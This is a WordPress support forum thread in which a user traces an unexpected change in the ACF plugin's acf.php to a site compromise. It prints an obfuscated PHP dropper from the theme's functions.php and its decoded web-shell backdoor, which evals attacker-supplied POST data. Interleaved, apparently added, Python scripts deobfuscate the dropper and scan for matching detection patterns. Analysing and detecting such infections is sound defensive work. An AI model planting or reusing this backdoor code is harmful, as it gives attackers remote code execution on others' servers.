
Solved

Bug or not in acf.php

  • Hello,

    I synchronize Dropbox with my server, and I was surprised by an update to acf.php.

    I did a diff between the previous version (on the left) and the new version (on the right), with lines of code added.

    I checked the latest version, and I found some extra lines at the top.

    I restored the previous version of acf.php.

    Can you tell me more?

    Please find the attached file.

    Thanks

  • There should not be any code up there. I did some looking but I found no information. My first reaction is that your site has been hacked. Do you have any other code on your site that should not be there?

  • Hello John,

    I think that's right, and maybe it's not a problem with your plugin (I think so because I only found “acf.php” yesterday).

    When I search for “$_POST['dd']” in the directory, I find many more files, modified more than a month ago…

    I found these files :

    wp-content/themes/yoo_balance_wp/comments.php
    wp-content/themes/yoo_balance_wp/sidebar.php
    wp-content/themes/yoo_balance_wp/changelog.php
    wp-content/themes/yoo_balance_wp/404.php
    wp-content/themes/yoo_balance_wp/footer.php
    wp-content/themes/yoo_balance_wp/config.php
    wp-content/themes/yoo_balance_wp/layouts/attachment.php
    wp-content/themes/yoo_balance_wp/layouts/template.config.php
    wp-content/themes/yoo_balance_wp/layouts/template.php
    wp-content/themes/yoo_balance_wp/layouts/_post.php
    wp-content/themes/yoo_balance_wp/layouts/page.php
    wp-content/themes/yoo_balance_wp/layouts/page.php
    wp-content/themes/yoo_balance_wp/layouts/module.php
    wp-content/themes/yoo_balance_wp/layouts/single.php
    wp-content/themes/yoo_balance_wp/header.php
    wp-content/themes/yoo_balance_wp/index.php
    wp-content/themes/yoo_balance_wp/functions.php
    wp-content/themes/yoo_balance_wp/functions.php
    wp-content/themes/yoo_balance_wp/cache/index.php

    About:

    /home/www/podologue/wp-content/themes/yoo_balance_wp/functions.php

    I found at the beginning:

    <?php
    $O00OO0 = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
    $O00O0O = $O00OO0{3} . $O00OO0{6} . $O00OO0{33} . $O00OO0{30};
    $O0OO00 = $O00OO0{33} . $O00OO0{10} . $O00OO0{24} . $O00OO0{10} . $O00OO0{24};
    $OO0O00 = $O0OO00{0} . $O00OO0{18} . $O00OO0{3} . $O0OO00{0} . $O0OO00{1} . $O00OO0{24};
    $OO0000 = $O00OO0{7} . $O00OO0{13};
    $O00O0O .= $O00OO0{22} . $O00OO0{36} . $O00OO0{29} . $O00OO0{26} . $O00OO0{30} . $O00OO0{32} . $O00OO0{35} . $O00OO0{26} . $O00OO0{30};
    eval($O00O0O("JE8wTzAwMD0iUHh0RFFxZnpZYWhtd0N2Wk51
    QmpMWHNNVWtJS0piSEVXT2dGeVZBU0dpUm5sVGRjcm9wZU5GU0JIREpreFViS1lDc0VHWHRmakl3cW5ocEF6Z1JsV1Z2ZW9UeW1hdUxkaU9yY1BaUU1OQjlZVVJ5R0N1TEtyV1NGcEIwdkhDTEpMMFRuV29yS3JXU0Z6MTA3cGFpS0F
    DTEtyV1NGcEIwOXBDcjB6b2k3RVdHWmdvYnlFSUViZ0N2aEkxdE5uMUxnejJFMXgyUzVnM24wcWtwRnoxMFFBT1NpTWFpMFYzMEdDS1RmVWE4dnhJdFFuS1RGcldUa3JDdlFWWTBBRWRUWHgzTFFnMjR2eEl0UW5LVEZyV1RrckN2UU
    1ZMEFDV2lLQWx5aEkwcmVUZXdkZzN5ZElteTlObXlkeDJiaXgyd2RBSDBBQ0hpN0JIWnpDbXRvRUlMMWNLNHZwS0dzZ0s1aXgzTER4SzFzcktUUWMyOVBwZndHQ3ZoenBhVDRVSUhaQU93R0N2aHZwQ3l2SkgwQUpIMEFOazQ9Ijtld
    mFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
    ?> 

    That means:

    <?php
    $fukq = @$_GET['fukq']; if($fukq == 't'){echo(@eval($_POST['fuckyou4321']));exit;}
    echo apiRequest();
    function apiRequest(){
        if(@$_GET['op'] == 'check')
        {
            return "connectjbmoveisok";
            exit();
        }
    }
    ?>

    So I think this is not the right place, and it's not your plugin.

    Sorry for the time you lost!
    I'll continue analysing.
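    The dropper quoted above resolves its function names through PHP string offsets, so the first layer can be unwrapped statically rather than by running it. The following is an added example, not code from the forum post, the theme or the ACF plugin: it reproduces the urldecode-plus-character-picking arithmetic on the alphabet string from the infected functions.php, and it implements the second layer, which this dropper family writes as `base64_decode(strtr(substr($k,2n), substr($k,n,n), substr($k,0,n)))`, on a constructed key (not the post's real payload). To apply the second step to the real file you would base64-decode the long string passed to `$O00O0O(...)` and hand the `$O0O000` value it contains to `unwrap_layer2`.

```python
"""Static unwrapping of the dropper shown above, without executing any PHP.

Added example, not code from the forum post, the theme or the ACF plugin.
Layer 1 is resolved on the alphabet copied from the infected file; layer 2 is
demonstrated on a constructed key (see constructed_sample), not the real one.
"""
import base64
import re
import string
from urllib.parse import unquote

# The urldecode() alphabet exactly as it appears in the infected functions.php above.
ALPHABET_ENC = ("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72"
                "%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A")


def pick(s, *idx):
    """Emulate PHP's  $s{i} . $s{j} . ...  string-offset concatenation."""
    return "".join(s[i] for i in idx)


def resolve_layer1():
    """Return what the four obfuscated variables evaluate to (pure string work, no eval)."""
    a = unquote(ALPHABET_ENC)                    # PHP urldecode()
    fn_decode = pick(a, 3, 6, 33, 30)            # $O00O0O, first half
    fn_strtr = pick(a, 33, 10, 24, 10, 24)       # $O0OO00
    fn_substr = (fn_strtr[0] + a[18] + a[3]      # $OO0O00 is assembled from the others
                 + fn_strtr[0] + fn_strtr[1] + a[24])
    n = int(pick(a, 7, 13))                      # $OO0000, a numeric string
    fn_decode += pick(a, 22, 36, 29, 26, 30, 32, 35, 26, 30)   # $O00O0O .= ...
    return {"O00O0O": fn_decode, "O0OO00": fn_strtr, "OO0O00": fn_substr, "OO0000": n}


def php_strtr(s, frm, to):
    """PHP strtr($s, $from, $to): per-character map; surplus chars of the longer string are ignored."""
    k = min(len(frm), len(to))
    return s.translate(str.maketrans(frm[:k], to[:k]))


def extract_inner_key(stage1_php):
    """Pull the $O0O000 = "..." key string out of the text that base64_decode() produced."""
    m = re.search(r'\$O0O000\s*=\s*"([^"]*)"', stage1_php)
    return m.group(1) if m else None


def unwrap_layer2(key, n=52):
    """Undo  base64_decode(strtr(substr($k,2n), substr($k,n,n), substr($k,0,n)))  statically."""
    payload = key[2 * n:]                                 # substr($k, $n*2)
    mapped = php_strtr(payload, key[n:2 * n], key[:n])    # strtr(payload, from, to)
    return base64.b64decode(mapped).decode("utf-8", errors="replace")


# Constructed sample for layer 2 (not the post's key): the 'to' alphabet is a-zA-Z and the
# 'from' alphabet is A-Za-z, so the substitution is simply a case swap of the base64 text.
SAMPLE_PHP = "<?php echo 'hello'; ?>"


def constructed_sample():
    to_alpha = string.ascii_lowercase + string.ascii_uppercase
    from_alpha = string.ascii_uppercase + string.ascii_lowercase
    payload = base64.b64encode(SAMPLE_PHP.encode()).decode().swapcase()
    return to_alpha + from_alpha + payload


if __name__ == "__main__":
    # {'O00O0O': 'base64_decode', 'O0OO00': 'strtr', 'OO0O00': 'substr', 'OO0000': 52}
    print(resolve_layer1())
    stage1 = '$O0O000="%s";eval(...);' % constructed_sample()
    print(unwrap_layer2(extract_inner_key(stage1)))      # <?php echo 'hello'; ?>
```

    The first stage therefore reads `eval(base64_decode("..."))`; the decoded text defines `$O0O000` and evaluates the three-argument `strtr` form with `n = 52`, which is what `unwrap_layer2` reverses. Nothing here executes attacker code, so it is safe to run over a quarantined copy of the file.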

    On this website:
    http://gotmls.net/support-topic/wp-site-guardian-warnings/

    When I search for “fuckyou4321”, I found:

    [code]
    Parameter: POST.fuckyou4321
    Data: echo (123454320+1);exit();
    Impact: 7/91
    Potential Vectors: Cross Site Scripting, Cross Site Request Forgery, Remote File Execution, Local File Inclusion
    [/code]

    If I take my last backup, from the 18th of December 2017 (I'm going to restore it; I don't know if a backdoor has been added), I don't find the line with $_POST['dd'], and my infected version on Dropbox is from the 18th of January 2017 (the oldest).

    The oldest Apache log in /var/log/apache2 is from the 25th of February, so it's impossible to check the request with the GET parameter… 🙁

    So it's a hack of my website.
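    The poster located the infected files by grepping for `$_POST['dd']` and sorting by modification time. The script below is an added example, not from the forum thread, the theme or the ACF plugin: it walks a directory, flags PHP lines that match a few indicators taken from the code in this thread (eval of a request parameter, eval of base64_decode, a long urldecode alphabet, variable names made only of `O` and `0`, eval through a variable-held function name), and reports both mtime and ctime. The fixture directory and its two files are constructed inline; the indicator names and the `build_fixture` helper are my own.

```python
"""Indicator scan over a WordPress tree, in the spirit of the grep in the post above.

Added example, not code from the thread, the theme or the ACF plugin. Reports
mtime and ctime: mtime is trivially back-dated with utime(2), while ctime is set
by the kernel on every inode change, so a fresh ctime on an "old" file is a tell.
"""
import os
import re
import tempfile
from datetime import datetime, timezone

INDICATORS = {
    "eval-of-request-param": re.compile(r"eval\s*\(.*\$_(?:POST|GET|REQUEST|COOKIE)\s*\["),
    "eval-base64": re.compile(r"eval\s*\(\s*@?\s*base64_decode\s*\("),
    # urldecode("...") whose literal holds at least eight %xx escapes, as in the dropper
    "urldecode-alphabet": re.compile(r'urldecode\s*\(\s*"[^"%]*(?:%[0-9A-Fa-f]{2}[^"%]*){8,}"'),
    "O0-variable-names": re.compile(r"\$[O0]{6,}\b"),
    "eval-via-variable": re.compile(r"eval\s*\(\s*\$[A-Za-z0-9_]+\s*\("),
}


def scan_line(line):
    """Names of every indicator that fires on one source line."""
    return [name for name, rx in INDICATORS.items() if rx.search(line)]


def _iso(ts):
    return datetime.fromtimestamp(ts, timezone.utc).isoformat(timespec="seconds")


def scan_tree(root):
    """Walk root, return one hit per (file, line) with the indicators and both timestamps."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in sorted(files):
            if not fn.endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            st = os.stat(path)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    names = scan_line(line)
                    if names:
                        hits.append({
                            "path": os.path.relpath(path, root),
                            "line": lineno,
                            "indicators": names,
                            "mtime": _iso(st.st_mtime),
                            "ctime": _iso(st.st_ctime),
                        })
    return hits


# Constructed fixture: one clean theme file and one with the dropper's shape (short, inert).
CLEAN_PHP = "<?php\nget_header();\necho esc_html(get_the_title());\n?>\n"
INFECTED_PHP = ('<?php\n'
                '$O00OO0 = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740");\n'
                '$O00O0O = $O00OO0{3} . $O00OO0{6};\n'
                'eval($O00O0O("QUJD"));\n'
                '?>\n'
                '<?php get_header(); ?>\n')


def build_fixture():
    """Create a throwaway tree with a clean file and an infected file; return its root."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    os.makedirs(os.path.join(root, "clean"))
    os.makedirs(os.path.join(root, "theme"))
    with open(os.path.join(root, "clean", "index.php"), "w") as fh:
        fh.write(CLEAN_PHP)
    with open(os.path.join(root, "theme", "functions.php"), "w") as fh:
        fh.write(INFECTED_PHP)
    return root


if __name__ == "__main__":
    for h in scan_tree(build_fixture()):
        print(f'{h["path"]}:{h["line"]}  {", ".join(h["indicators"])}  '
              f'mtime={h["mtime"]} ctime={h["ctime"]}')
```

    Run it against `wp-content` (`scan_tree("/home/www/podologue/wp-content")`) from a read-only copy or a backup, then compare the flagged files against a clean download of the same theme and plugin versions; the regexes are deliberately narrow, so treat a hit as something to diff, not as proof on its own.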

  • I'm going to install an Apache mod to get all the information about incoming and outgoing requests for GET/POST.
    If I'm hacked again, I will get all the information and the page with the XSS bug, hopefully…

    http://httpd.apache.org/docs/2.4/mod/mod_dumpio.html
